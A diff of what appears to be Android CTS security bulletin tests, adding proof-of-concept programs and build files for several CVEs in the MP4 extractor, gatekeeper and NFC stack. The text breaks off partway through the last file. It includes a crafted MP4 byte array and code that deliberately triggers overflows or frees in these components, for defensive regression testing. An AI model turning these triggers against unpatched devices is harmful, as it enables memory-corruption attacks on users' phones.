00000000000..ea6935f7523 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp @@ -0,0 +1,143 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include "stdlib.h" + +#include "../includes/memutils_track.h" +#include <android/IMediaExtractor.h> +#include <datasource/DataSourceFactory.h> +#include <dlfcn.h> +#include <media/DataSource.h> +#include <media/IMediaHTTPService.h> +#include <media/stagefright/DataSourceBase.h> +#include <media/stagefright/MediaExtractor.h> +#include <media/stagefright/MetaData.h> + +unsigned char mp4_data[] = { + 0x00, 0x00, 0x00, 0x1C, 0x66, 0x74, 0x79, 0x70, 0x6D, 0x70, 0x34, 0x32, + 0x00, 0x00, 0x00, 0x00, 0x6D, 0x70, 0x34, 0x32, 0x64, 0x62, 0x79, 0x31, + 0x69, 0x73, 0x6F, 0x6D, 0x00, 0x00, 0x00, 0x74, 0x6D, 0x6F, 0x6F, 0x76, + 0x00, 0x00, 0x00, 0x6C, 0x75, 0x64, 0x74, 0x61, 0x00, 0x00, 0x00, 0x64, + 0x6D, 0x65, 0x74, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x58, + 0x69, 0x6C, 0x73, 0x74, 0x00, 0x00, 0x00, 0x50, 0x2D, 0x2D, 0x2D, 0x2D, + 0x00, 0x00, 0x00, 0x1C, 0x6D, 0x65, 0x61, 0x6E, 0x00, 0x00, 0x00, 0x00, + 0x63, 0x6F, 0x6D, 0x2E, 0x61, 0x70, 0x70, 0x6C, 0x65, 0x2E, 0x69, 0x54, + 0x75, 0x6E, 0x65, 0x73, 0x00, 0x00, 0x00, 0x14, 0x6E, 0x61, 0x6D, 0x65, + 0x00, 0x00, 0x00, 0x00, 0x69, 0x54, 0x75, 0x6E, 0x53, 0x4D, 0x50, 0x42, + 0x00, 0x08, 0x00, 0x18, 0x64, 0x61, 0x74, 0x61, 0x33, 0x32, 0x20, 0x34, + 0x20, 0x33, 0x20, 0x32, 0x33, 0x32, 0x20, 0x34, 0x20, 0x33, 0x20, 0x32}; + +#if _32_BIT +#define LIBNAME "/system/lib/extractors/libmp4extractor.so" +#define LIBNAME_APEX "/apex/com.android.media/lib/extractors/libmp4extractor.so" +#elif _64_BIT +#define LIBNAME "/system/lib64/extractors/libmp4extractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib64/extractors/libmp4extractor.so" +#endif + +#define TOTAL_SIZE 524432 +#define DATA_SIZE 144 +#define TRACK_SIZE (TOTAL_SIZE - DATA_SIZE + 16 + 1) +#define TMP_FILE "/data/local/tmp/temp_cve_2017_0726" + +char enable_selective_overload = ENABLE_NONE; +using namespace android; + +bool is_tracking_required(size_t size) { return (size == TRACK_SIZE); } + +int main() { + GetExtractorDef getDef = nullptr; + FILE *fp = fopen(TMP_FILE, "wb"); + if (!fp) { + return EXIT_FAILURE; + } + + char zero_array[TOTAL_SIZE - DATA_SIZE]; + memset(zero_array, 0, (TOTAL_SIZE - DATA_SIZE) * sizeof(char)); + + /* Write mp4 stream */ + fwrite(mp4_data, 1, DATA_SIZE, fp); + + /* Append 0's to create custom PoC */ + fwrite(zero_array, 1, (TOTAL_SIZE - DATA_SIZE), fp); + fclose(fp); + + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + remove(TMP_FILE); + return EXIT_FAILURE; + } + } + + getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + remove(TMP_FILE); + return EXIT_FAILURE; + } + + sp<DataSource> dataSource = + DataSourceFactory::getInstance()->CreateFromURI(NULL, TMP_FILE); + if (dataSource == nullptr) { + dlclose(libHandle); + remove(TMP_FILE); + return EXIT_FAILURE; + } + + void *meta = nullptr; + void *creator = nullptr; + FreeMetaFunc freeMeta = nullptr; + float confidence; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + creator = (void *)getDef().u.v2.sniff(dataSource->wrap(), &confidence, + &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + creator = (void *)getDef().u.v3.sniff(dataSource->wrap(), &confidence, + &meta, &freeMeta); + } + if (!creator) { + dlclose(libHandle); + remove(TMP_FILE); + return EXIT_FAILURE; + } + + CMediaExtractor *ret = ((CreatorFunc)creator)(dataSource->wrap(), meta); + if (ret == nullptr) { + dlclose(libHandle); + remove(TMP_FILE); + return EXIT_FAILURE; + } + + if (meta != nullptr && freeMeta != nullptr) { + freeMeta(meta); + } + + sp<MetaData> metaData = new MetaData(); + MediaExtractorCUnwrapper *mediaExtractorCUnwrapper = + new MediaExtractorCUnwrapper(ret); + enable_selective_overload = ENABLE_MALLOC_CHECK; + mediaExtractorCUnwrapper->getTrackMetaData(*metaData.get(), 0, 1); + enable_selective_overload = ENABLE_NONE; + + remove(TMP_FILE); + dlclose(libHandle); + + return EXIT_SUCCESS; +} diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp index f32aa90632c..4052106c755 100644 --- a/tests/tests/security/src/android/security/cts/CVE_2021_0322_SliceProvider.java +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/Android.bp @@ -1,26 +1,30 @@ /* - * Copyright (C) 2020 The Android Open Source Project + * Copyright (C) 2021 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at + * You may obtain a copy of the License at: * - * http://www.apache.org/licenses/LICENSE-2.0 + * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. + * */ -package android.security.cts; - -import android.content.Context; - -public class CVE_2021_0322_SliceProvider extends android.app.slice.SliceProvider { - @Override - public boolean onCreate() { - return true; - } +cc_test { + name: "CVE-2019-2115", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + include_dirs: [ + "system/gatekeeper/include/gatekeeper/", + ], + shared_libs: [ + "libgatekeeper", + ], } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp new file mode 100644 index 00000000000..9ddc0e16c3a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2115/poc.cpp @@ -0,0 +1,106 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#define private public + +#include "../includes/common.h" +#include "gatekeeper.h" + +using namespace gatekeeper; + +bool isVulnerable = false; +const uint8_t *authTokenKey = nullptr; + +void *operator new(decltype(sizeof(0)) n) noexcept(false) { return malloc(n); } + +void operator delete(void *ptr) throw() { + if (ptr == authTokenKey) { + isVulnerable = true; + } + if (!ptr) { + free(ptr); + } +} + +class DerivedGateKeeper : public GateKeeper { + protected: + bool GetAuthTokenKey(const uint8_t **auth_token_key, + uint32_t *length __attribute__((unused))) const { + *auth_token_key = (const uint8_t *)(new uint8_t()); + authTokenKey = *auth_token_key; + return true; + } + void GetPasswordKey(const uint8_t **password_key __attribute__((unused)), + uint32_t *length __attribute__((unused))) {} + void ComputePasswordSignature(uint8_t *signature __attribute__((unused)), + uint32_t signature_length __attribute__((unused)), + const uint8_t *key __attribute__((unused)), + uint32_t key_length __attribute__((unused)), + const uint8_t *password __attribute__((unused)), + uint32_t password_length __attribute__((unused)), + salt_t salt __attribute__((unused))) const {} + void GetRandom(void *random __attribute__((unused)), + uint32_t requested_size __attribute__((unused))) const {} + void ComputeSignature(uint8_t *signature __attribute__((unused)), + uint32_t signature_length __attribute__((unused)), + const uint8_t *key __attribute__((unused)), + uint32_t key_length __attribute__((unused)), + const uint8_t *message __attribute__((unused)), + const uint32_t length __attribute__((unused))) const {} + uint64_t GetMillisecondsSinceBoot() const { return EXIT_SUCCESS; } + bool GetFailureRecord(uint32_t uid __attribute__((unused)), + secure_id_t user_id __attribute__((unused)), + failure_record_t *record __attribute__((unused)), + bool secure __attribute__((unused))) { + return false; + } + bool ClearFailureRecord(uint32_t uid __attribute__((unused)), + secure_id_t user_id __attribute__((unused)), + bool secure __attribute__((unused))) { + return false; + } + bool WriteFailureRecord(uint32_t uid __attribute__((unused)), + failure_record_t *record __attribute__((unused)), + bool secure __attribute__((unused))) { + return false; + } + uint32_t ComputeRetryTimeout(const failure_record_t *record __attribute__((unused))) { + return EXIT_SUCCESS; + } + virtual bool IsHardwareBacked() const { return false; } + bool DoVerify(const password_handle_t *expected_handle __attribute__((unused)), + const SizedBuffer &password __attribute__((unused))) { + return false; + } +}; + +int main() { + uint8_t *auth_token = new uint8_t(); + uint32_t length = sizeof(uint32_t); + SizedBuffer *sb = new SizedBuffer(auth_token, length); + uint64_t timestamp = 1; + secure_id_t user_id = 1; + secure_id_t authenticator_id = 1; + uint64_t challenge = 0; + + DerivedGateKeeper *object = new DerivedGateKeeper(); + object->MintAuthToken(sb, timestamp, user_id, authenticator_id, challenge); + + delete auth_token; + delete object; + delete sb; + return (isVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp new file mode 100644 index 00000000000..1166510586a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/Android.bp @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE_2019_2135", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/nfa/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/include/", + "system/nfc/src/gki/ulinux/", + "packages/apps/Nfc/nci/jni/extns/pn54x/src/common/", + "packages/apps/Nfc/nci/jni/extns/pn54x/inc/", + ], + shared_libs: [ + "libnfc_nci_jni", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp new file mode 100644 index 00000000000..582ddb8c9d8 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2135/poc.cpp @@ -0,0 +1,40 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfa_api.h> +#include <nfc_api.h> +#include <phNfcTypes.h> +#include <phNxpExtns.h> + +static void nfaMockDMCallback(uint8_t, tNFA_DM_CBACK_DATA *) {} +static void nfaMockCCallback(uint8_t, tNFA_CONN_EVT_DATA *) {} + +int main(void) { + if (EXTNS_Init(nfaMockDMCallback, nfaMockCCallback) != NFCSTATUS_SUCCESS) { + return EXIT_FAILURE; + } + const int32_t size = 16; + const int32_t offset = size - 1; + uint8_t *p_data = static_cast<uint8_t *>(malloc(size)); + if (p_data == nullptr) { + return EXIT_FAILURE; + } + p_data[offset] = 0x60; + EXTNS_MfcTransceive(&p_data[offset], 1); + free(p_data); + EXTNS_Close(); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp new file mode 100644 index 00000000000..d6adf3ce8af --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/Android.bp @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0037", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp new file mode 100644 index 00000000000..766ee038b44 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0037/poc.cpp @@ -0,0 +1,147 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include "../includes/common.h" +#include "../includes/memutils.h" + +char enable_selective_overload = ENABLE_NONE; + +#include <dlfcn.h> +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <tags_defs.h> + +// borrowed from rw_i93.cc +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t *p_uid); + +bool kIsInitialized = false; + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +static void *(*real_GKI_getbuf)(uint16_t size) = nullptr; +static void (*real_GKI_freebuf)(void *ptr) = nullptr; + +void init(void) { + real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft"); + if (!real_GKI_getbuf) { + return; + } + + real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv"); + if (!real_GKI_freebuf) { + return; + } + + kIsInitialized = true; +} + +void *GKI_getbuf(uint16_t size) { + if (!kIsInitialized) { + init(); + } + return malloc(size); +} + +void GKI_freebuf(void *ptr) { + if (!kIsInitialized) { + init(); + } + free(ptr); +} + +int main() { + tRW_I93_CB *p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16); + tNFC_CONN_EVT event = NFC_DATA_CEVT; + p_i93->state = RW_I93_STATE_SET_READ_ONLY; + p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC; + p_i93->block_size = 255; + + enable_selective_overload = ENABLE_ALL; + tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN)); + if (!p_data) { + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR)); + if (!(p_data->data.p_data)) { + free(p_data); + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_NONE; + + (p_data->data.p_data)->len = 10; + p_data->data.p_data->offset = 0; + p_data->status = NFC_STATUS_OK; + + p_cb->p_cback(0, event, p_data); + + free(p_data); + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp new file mode 100644 index 00000000000..195d430aec5 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/Android.bp @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0038", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp new file mode 100644 index 00000000000..27acfe3d319 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0038/poc.cpp @@ -0,0 +1,147 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include "../includes/common.h" +#include "../includes/memutils.h" + +char enable_selective_overload = ENABLE_NONE; + +#include <dlfcn.h> +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <tags_defs.h> + +// borrowed from rw_i93.cc +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t *p_uid); + +bool kIsInitialized = false; + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +static void *(*real_GKI_getbuf)(uint16_t size) = nullptr; +static void (*real_GKI_freebuf)(void *ptr) = nullptr; + +void init(void) { + real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft"); + if (!real_GKI_getbuf) { + return; + } + + real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv"); + if (!real_GKI_freebuf) { + return; + } + + kIsInitialized = true; +} + +void *GKI_getbuf(uint16_t size) { + if (!kIsInitialized) { + init(); + } + return malloc(size); +} + +void GKI_freebuf(void *ptr) { + if (!kIsInitialized) { + init(); + } + free(ptr); +} + +int main() { + tRW_I93_CB *p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16); + tNFC_CONN_EVT event = NFC_DATA_CEVT; + p_i93->state = RW_I93_STATE_UPDATE_NDEF; + p_i93->sub_state = RW_I93_SUBSTATE_RESET_LEN; + p_i93->block_size = 30; + + enable_selective_overload = ENABLE_ALL; + tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN)); + if (!p_data) { + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR)); + if (!(p_data->data.p_data)) { + free(p_data); + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_NONE; + + (p_data->data.p_data)->len = 10; + p_data->data.p_data->offset = 0; + p_data->status = NFC_STATUS_OK; + + p_cb->p_cback(0, event, p_data); + + free(p_data); + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp new file mode 100644 index 00000000000..16dac281b93 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/Android.bp @@ -0,0 +1,40 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0039", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp new file mode 100644 index 00000000000..6ebc3f331ae --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0039/poc.cpp @@ -0,0 +1,148 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include "../includes/common.h" +#include "../includes/memutils.h" + +char enable_selective_overload = ENABLE_NONE; + +#include <dlfcn.h> +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <tags_defs.h> + +// borrowed from rw_i93.cc +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t *p_uid); + +bool kIsInitialized = false; + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + 